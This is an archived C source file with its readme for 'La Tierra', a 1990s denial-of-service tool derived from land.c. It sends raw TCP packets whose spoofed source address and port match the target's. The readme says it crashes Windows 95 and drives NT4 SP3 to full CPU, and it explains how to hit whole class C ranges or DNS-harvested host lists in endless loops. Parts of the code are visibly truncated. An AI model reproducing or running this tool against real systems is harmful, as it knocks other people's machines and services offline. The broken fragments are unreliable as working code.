home *** CD-ROM | disk | FTP | other *** search
- /**************************************************************/
- /* */
- /* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */
- /* */
- /* Modified version of land.c by m3lt, FLC */
- /* */
- /* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */
- /* gcc version tabs set to 3 */
- /* */
- /* gcc latierra.c -o latierra */
- /* */
- /* Refer to readme.txt for more details and history */
- /* */
- /**************************************************************/
- #include <stdio.h>
- #include <getopt.h>
- #include <string.h>
- #include <netdb.h>
- #include <arpa/inet.h>
- #include <netinet/in.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/ip.h>
- #include <netinet/ip_tcp.h>
- #include <netinet/protocols.h>
- #define TRUE 1
- #define FALSE 0
- #define FOR_EVER -5
- #define LIST_FILE 1
- #define ZONE_FILE 2
- #define MAXLINELENGTH 512
- #define DEFAULT_SEQ 0xF1C
- #define DEFAULT_TTL 0xFF
- struct pseudohdr
- {
- struct in_addr saddr;
- struct in_addr daddr;
- u_char zero;
- u_char protocol;
- u_short length;
- struct tcphdr tcpheader;
- };
- typedef struct latierra_data
- {
- char dest_ip[256];
- int tcp_flags;
- int window_size;
- int ip_protocol;
- int sequence_number;
- int ttl;
- int supress_output;
- int message_type;
- void alternatives(void);
- int get_ip(int use_file, FILE *fp, char *buff);
- int land(LATIERRA_DATA *ld, int port_number);
- void nslookup_help(void);
- void print_arguments(void);
- void protocol_list(void);
- /********/
- /* main */
- /********/
- int main(int argc, char **argv)
- {
- FILE *fp;
- int frequency = DEFAULT_FREQUENCY, x;
- int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
- int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
- char got_ip = FALSE, got_beg_port = FALSE;
- char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
- printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
- printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
- strcpy(valid_tcp_flags, "fsrpau");
- ld.tcp_flags = 0;
- ld.window_size = DEFAULT_WINSIZE;
- ld.ip_protocol = IP_TCP;
- ld.sequence_number = DEFAULT_SEQ;
- ld.ttl = DEFAULT_TTL;
- ld.message_type = 0;
- if(argc > 1 && (!strcmp(argv[1], "-a")))
- alternatives();
- if(argc > 1 && (!strcmp(argv[1], "-n")))
- nslookup_help();
- if(argc > 1 && (!strcmp(argv[1], "-p")))
- protocol_list();
- if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
- print_arguments();
- while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
- {
- switch(i)
- {
- case 't':
- for(x=0;x<strlen(optarg);x++)
- switch(optarg[x])
- {
- case 'f': /* fin */
- ld.tcp_flags |= TH_FIN;
- break;
- case 's': /* syn */
- ld.tcp_flags |= TH_SYN;
- break;
- case 'r': /* reset */
- ld.tcp_flags |= TH_RST;
- break;
- case 'p': /* push */
- ld.tcp_flags |= TH_PUSH;
- break;
- case 'a': /* ack */
- ld.tcp_flags |= TH_ACK;
- break;
- case 'u': /* urgent */
- ld.tcp_flags |= TH_URG;
- break;
- default:
- printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
- return(-12);
- break;
- }
- break;
- case 'q':
- ld.sequence_number = atoi(optarg);
- break;
- case 'w':
- ld.window_size = atoi(optarg);
- break;
- case 'm':
- ld.message_type = atoi(optarg);
- break;
- case 'v':
- ld.ttl = atoi(optarg);
- break;
- case 'p':
- ld.ip_protocol = atoi(optarg);
- break;
- case 'o':
- ld.supress_output = TRUE;
- break;
- case 'i':
- if(strlen(optarg) > 1)
- strcpy(ld.dest_ip, optarg);
- else
- {
- printf("ERROR: Must specify valid IP or hostname.\n");
- return(-6);
- }
- got_ip = TRUE;
- break;
- case 's':
- frequency = atoi(optarg);
- break;
- case 'l':
- loop = atoi(optarg);
- break;
- case 'b':
- beginning_port = atoi(optarg);
- got_beg_port = TRUE;
- break;
- case 'e':
- ending_port = atoi(optarg);
- break;
- }
- }
- if(!ld.tcp_flags)
- ld.tcp_flags = DEFAULT_TCPFLAGS;
- if(!got_beg_port)
- {
- fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n");
- return(-7);
- }
- if(ending_port == 0)
- ending_port = beginning_port;
- printf("\nSettings:\n\n");
- printf(" (-i) Dest. IP Addr : ");
- if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
- {
- ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
- strcpy(class_c_addr, ld.dest_ip);
- strcat(ld.dest_ip, "1");
- printf(" %s (Class C range specified).\n", ld.dest_ip);
- increment_addr = TRUE;
- octet = 1;
- }
- else
- if(strlen(ld.dest_ip) > 5)
- {
- if(strncmp(ld.dest_ip, "zone=", 5)==0)
- {
- strcpy(filename, &ld.dest_ip[5]);
- printf("%s (using DNS zone file)\n", filename);
- use_file = ZONE_FILE;
- }
- else if(strncmp(ld.dest_ip, "list=", 5) == 0)
- {
- strcpy(filename, &ld.dest_ip[5]);
- printf("%s (using ASCII list)\n", filename);
- use_file = LIST_FILE;
- }
- else
- printf("%s\n", ld.dest_ip);
- }
- else
- {
- printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
- return(-9);
- }
- printf(" (-b) Beginning Port #: %d\n", beginning_port );
- printf(" (-e) Ending Port # : %d\n", ending_port );
- printf(" (-s) Seconds to Pause: %d\n", frequency );
- printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " );
- printf(" (-w) Window size : %d\n", ld.window_size );
- printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
- printf(" (-v) Time-to-Live : %d\n", ld.ttl);
- printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol );
- printf(" (-t) TCP flags : ");
- strcpy(buff, "");
- if( ld.tcp_flags & TH_FIN)
- strcat(buff, "fin ");
- if( ld.tcp_flags & TH_SYN)
- strcat(buff, "syn ");
- if(ld.tcp_flags & TH_RST)
- strcat(buff, "rst ");
- if(ld.tcp_flags & TH_PUSH)
- strcat(buff, "push ");
- if(ld.tcp_flags & TH_ACK)
- strcat(buff, "ack ");
- if(ld.tcp_flags & TH_URG)
- strcat(buff, "urg ");
- printf("%s\n\n", buff);
- if(ending_port < beginning_port)
- {
- printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
- return(-8);
- }
- scan_loop = loop_val = loop;
- if(use_file)
- {
- if(access(filename, 0))
- {
- printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
- return(-9);
- }
- if( (fp = fopen(filename, "rt")) == NULL)
- {
- printf("ERROR: Unable to open %s.\n", filename);
- return(-10);
- }
- if(!get_ip(use_file, fp, buff))
- {
- printf("Unable to get any IP address from file %s.\n");
- return(-11);
- }
- strcpy(ld.dest_ip, buff);
- }
- while( (loop == FOR_EVER) ? 1 : loop-- > 0)
- {
- for(i=beginning_port; i <= ending_port; i++)
- {
- if(land(&ld, i)) /* go for it BaBy! */
- break;
- if(frequency) /* make sure freq > 0 */
- {
- if(!ld.supress_output)
- printf("-> paused %d seconds.\n", frequency);
- sleep(frequency);
- }
- }
- if( (!use_file) && (loop && increment_addr) )
- {
- char temp_addr[21];
- if(++octet > 254) /* check for reset */
- {
- if(loop_val != FOR_EVER) /* make sure not to distrute forever! */
- {
- if(++scan_loop > loop_val) /* check if scanned x times */
- break;
- else
- loop = loop_val; /* restore original value */
- }
- octet = 1; /* reset */
- }
- sprintf(temp_addr, "%s%d", class_c_addr, octet);
- strcpy(ld.dest_ip, temp_addr);
- if(!ld.supress_output)
- printf("** incrementing to next IP address: %s\n", ld.dest_ip);
- if(scan_loop > loop_val)
- break; /* break while loop */
- }
- else if(use_file)
- {
- if(!get_ip(use_file, fp, buff))
- break;
- loop++;
- strcpy(ld.dest_ip, buff);
- }
- } /* end while */
- printf("\nDone.\n\n");
- } /* end main */
- int get_ip(int use_file, FILE *fp, char *buff)
- {
- if(use_file == LIST_FILE)
- return(get_ip_from_list(fp, buff));
- return(get_ip_from_zone(fp, buff));
- }
- int get_ip_from_list(FILE *fp, char *buff)
- {
- int ret_val;
- while(1)
- {
- ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
- if((ret_val == EOF) || (ret_val == (int)NULL))
- return 0;
- if( strlen(buff) >= 7)
- if((buff[0] != ';') && (buff[0] != '['))
- {
- if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
- buff[strlen(buff)-1] = 0x0;
- return 1;
- }
- }
- return 0;
- }
- int get_ip_from_zone(FILE *fp, char *buff)
- {
- int ret_val, i;
- char *p, delim[8];
- strcpy(delim, " \t");
- while(1)
- {
- ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
- if((ret_val == EOF) || (ret_val == (int)NULL))
- return 0;
- if( strlen(buff) >= 7)
- if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
- {
- if( (p = strtok( buff, delim)) == NULL)
- continue;
- if( (p = strtok(NULL, delim)) == NULL)
- continue;
- if(strcmp(p, "A")) /* be sure second column is an DNS A record */
- continue;
- if( (p = strtok(NULL, delim)) == NULL)
- continue;
- strcpy(buff, p);
- /* verify that we have a valid IP address to work with */
- if(inet_addr(p) == -1)
- continue;
- /* strip off training line characters */
- if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
- buff[strlen(buff)-1] = 0x0;
- return 1;
- }
- }
- return 0;
- }
- /************/
- /* checksum */
- /************/
- u_short checksum(u_short * data,u_short length)
- {
- register long value;
- u_short i;
- for(i = 0; i< (length >> 1); i++)
- value += data[i];
- if((length & 1)==1)
- value += (data[i] << 8);
- value = (value & 0xFFFF) + (value >> 16);
- return(~value);
- }
- /********/
- /* land */
- /********/
- int land(LATIERRA_DATA *ld, int port_number)
- {
- struct sockaddr_in sin;
- int sock;
- char buffer[40];
- struct iphdr * ipheader = (struct iphdr *) buffer;
- struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
- struct pseudohdr pseudoheader;
- bzero(&sin,sizeof(struct sockaddr_in));
- sin.sin_family=AF_INET;
- if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
- {
- printf("ERROR: unknown host %s\n", ld->dest_ip);
- return(-1);
- }
- if((sin.sin_port=htons(port_number))==0)
- {
- printf("ERROR: unknown port %s\n",port_number);
- return(-2);
- }
- if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
- {
- printf("ERROR: couldn't allocate raw socket\n");
- return(-3);
- }
- bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
- ipheader->version=4;
- ipheader->ihl=sizeof(struct iphdr)/4;
- ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
- ipheader->id=htons(ld->sequence_number);
- ipheader->ttl = ld->ttl;
- ipheader->protocol = ld->ip_protocol;
- ipheader->saddr=sin.sin_addr.s_addr;
- ipheader->daddr=sin.sin_addr.s_addr;
- tcpheader->th_sport = sin.sin_port;
- tcpheader->th_dport = sin.sin_port;
- tcpheader->th_seq = htonl(ld->sequence_number);
- tcpheader->th_flags = ld->tcp_flags;
- tcpheader->th_off = sizeof(struct tcphdr)/4;
- tcpheader->th_win = htons(ld->window_size);
- bzero(&pseudoheader,12+sizeof(struct tcphdr));
- pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
- pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
- pseudoheader.protocol = ld->ip_protocol;
- pseudoheader.length = htons(sizeof(struct tcphdr));
- bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
- tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
- if( sendto(sock, buffer,
- sizeof(struct iphdr)+sizeof(struct tcphdr),
- ld->message_type,
- (struct sockaddr *) &sin,
- sizeof(struct sockaddr_in) )==-1)
- {
- printf("ERROR: can't send packet. (sendto failed)\n");
- return(-4);
- }
- if(!ld->supress_output)
- printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
- close(sock);
- return(0);
- }
- /* End of land */
- void alternatives()
- {
- printf("\nAlternative command line arguments for option -i\n\n");
- printf(" You can create two types of files that latierra can use to get\n");
- printf(" a list of IP addresses, a simple ASCII file with each IP address\n");
- printf(" appearing on each line or better yet, a DNS zone file created by\n");
- printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n");
- printf(" command line of latierra.\n\n");
- printf(" Basically, latierra will walk down the list and send the spoofed packet\n");
- printf(" to each IP address. Once the list is complete, and loop > 1, the list\n");
- printf(" is repeated. To specify that the '-i' option should use a zone file,\n");
- printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n");
- printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n");
- printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n");
- printf(" record (second column)in a zone file will ignored.\n\n");
- exit(-1);
- }
- void nslookup_help()
- {
- printf("\nNSLOOKUP help\n\n");
- printf("To see who is the DNS server for a particular domain, issue the following:\n");
- printf(" > set type=ns\n");
- printf(" > xyz.com\n\n");
- printf(" You will see a list of the name server(s) if completed successfully\n\n");
- printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
- printf("and issue the following commands:\n");
- printf(" > server\n");
- printf(" > ls -d xyz.com > filename.txt\n\n");
- printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
- printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
- exit(-1);
- }
- void protocol_list()
- {
- printf("\nProtocol List:\n\n");
- printf("Verified:\n");
- printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n");
- printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n");
- printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n");
- printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n");
- printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n");
- printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n");
- printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n");
- printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n");
- printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n");
- printf("Supported:\n");
- printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n");
- exit(-1);
- }
- void print_arguments()
- {
- printf("Arguments: \n");
- printf(" * -i dest_ip = destination ip address such as\n");
- printf(" If last octet is '-', then the address will increment\n");
- printf(" from 1 to 254 (Class C) on the next loop\n");
- printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
- printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
- printf(" For list of alternative options, use -a instead of -h.\n");
- printf(" * -b port# = beginning port number (required).\n");
- printf(" -e port# = ending port number (optional)\n");
- printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
- printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL);
- printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
- printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
- printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
- printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
- printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
- printf(" -o 1 = supress additional output to screen, default=0\n" );
- printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
- printf(" * = required ~ = default parameter values\n\n");
- exit(-1);
- }
- /* End of file */
- ----------------- readme.txt ------------------------------
- La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net
- Modified version of land.c by m3lt, FLC
- To compile latierra, type:
- gcc latierra.c -o latierra
- To see the help screen, use 'latierra -h'
- This program crashes Windows 95, and will cause Windows NT
- 4.0, SP3 to utilize a high percentage of CPU. In some
- instances, CPU usage reaches %100.
- land.c description:
- land.c sends a spoofed packet with the SYN flag from the
- the same IP and port number as the destination. For
- example, if you want to do a DoS on, port 80, it would
- spoof port 80 as the source. The problem is with
- NT4 SP3, however, is once you issue this packet to a
- port, NT4 SP3 appears to ignore all other attempts -
- UNTIL ...
- La Tierra!
- La Tierra description:
- La Tierra basically works by sending NT the same packet
- used in land.c but to more than one port (if specified).
- It doesn't appear to matter if the port is opened or closed!
- NT doesn't appear to let this happen again on the same port
- successively, but you simply change ports, and you can easily
- go back to the original port and it'll work again. What's even
- more interesting is the fact that port 139 works with this.
- You would have thought - I'll leave that alone for now!
- While testing, I used a Compaq dual Intel Pentium Pro 200, and
- was able to take up to %64 CPU. With one processor disabled,
- CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs
- time to recover, even with one spoofed packet.
- Features include:
- - Ability to launch a DoS on an entire class C address
- - Specify the beginning and ending port range
- - Specify the number of loops or make it loop forever!
- - User defined TCP flags: fin, syn, reset, push, ack,
- and urgent
- - Other IP options such as window size, time-to-live,
- sequence_number, and message_type
- - Ability to read a DNS zone file for IP addresses
- - Ability to read a ASCII file containing IP addresses
- Command line options:
- - i ip_address
- RANGE: Valid IP Address
- where ip_address is a valid ip_address, or if you wish to
- cycle through a class C address, the last octet is dropped
- and replaced with a '-'. This option is required. The
- source and destination address are obtained from this value.
- Rather than specifying an IP address, you may wish to create
- an ASCII file, or better yet, use nslookup to obtain all
- zone information for a particular domain. The ASCII file
- simply contains a list of IP addresses, one on each line.
- To get a DNS file, simply use nslookup, and the
- "ls -d somedomain.com > filename.txt" command. You can use
- 'latierra -n' to read more about the command sequence for
- nslookup.
- In both types of files, lines that begin with ';' or '[' are
- ignored. In DNS files, only 'A' records are processed.
- Examples:
- Single IP Address:
- -i
- Class C range:
- -i 10.1.2.-
- ASCII file:
- -i list=filename.txt
- DNS file:
- -i zone=filename.txt
- -b beginning_port_number
- RANGE: Positive Integer
- where this value is the port_number that latierra will use. If
- no ending_port_number is specified, ending_port_number is then
- equal to this value. Valid range is 1 to 0xFFFF
- -e ending_port_number
- DEFAULT: If not specified, equal to beginning_port_number
- RANGE: Positive Integer
- is the highest port number in the range to cycle through.
- Example:
- -i -b 23 -e 80
- will start at port 23 and increment up to port 80. You can
- delay the next increment by using the -s option. Valid range
- is 1 to 0xFFFF
- -s seconds_between_spoofs
- RANGE: Positive Integer
- You may want to control the seconds between spoofs. If you
- specify a zero, no delays occur.
- In the below example, the spoof will between ports 23 and 80,
- every 3 seconds.
- -i -b 23 -e 80 -s 3
- -l number_of_loops
- RANGE: Positive Integer, -5 loops forever
- This option if set greater than 1, will cause a repeat of the
- cycle. For example:
- -i -b 23 -e 80 -s 0 -l 8
- will cause latierra to go through ports 23 through 80 and
- repeat the process 8 times, with no delay. Look at the
- following example:
- -i 10.1.2.- -b 23 -e 80 -s 0 -l 8
- latierra will start at, port 23 through 80, then
- increment to, port 23 through 80, and so on until
- it gets to, in which case it will repeat the
- same procedure over again 8 times.
- By specifying a value of -5 for this option, latierra will
- loop forever, until you manually stop the process. In the
- last example above, the procedure would never end. When it
- reaches, it falls back to and start
- over again from there.
- Other examples:
- -i -b 139 -s 0 -l -5
- -i 10.1.2.- -b 80 -s 5 -l 10
- -t tcp_flags
- RANGE: valid character set (see below)
- this option sets the various TCP flags, which include:
- f = fin s = syn r = reset
- p = push a = ack u = urgent
- Example:
- -i -b 139 -t apu -s 0
- To set the ack, push, and urgent flag
- -v time_to_live_value
- DEFAULT: 0xFF (255 decimal)
- RANGE: Positive Integer
- Sets the time to live value.
- -p protocol_value
- DEFAULT: 6 (tcp)
- RANGE: Positive Integer
- Sets the protocol value in the IP header. To see a list of
- available protocols, run "latierra -p".
- -w window_size_value
- DEFAULT: 0xFFFF (65000 decimal)
- RANGE: Positive long value
- -q tcp_sequence_number_value
- RANGE: Positive integer
- -o 1 supress_additional_output
- DEFAULT: messages are printed for status
- RANGE: None
- If you don't want to see the messages during the process,
- simply use this "-o 1" to turn them off.
- Final Note:
- Please use this program for in-house testing purposes only.
- Just because your sending spoofed packets, doesn't mean you
- can't be traced.
- Good luck.
- - MondoMan
- elmondo@usa.net
- -------------------- end of file -------------------------------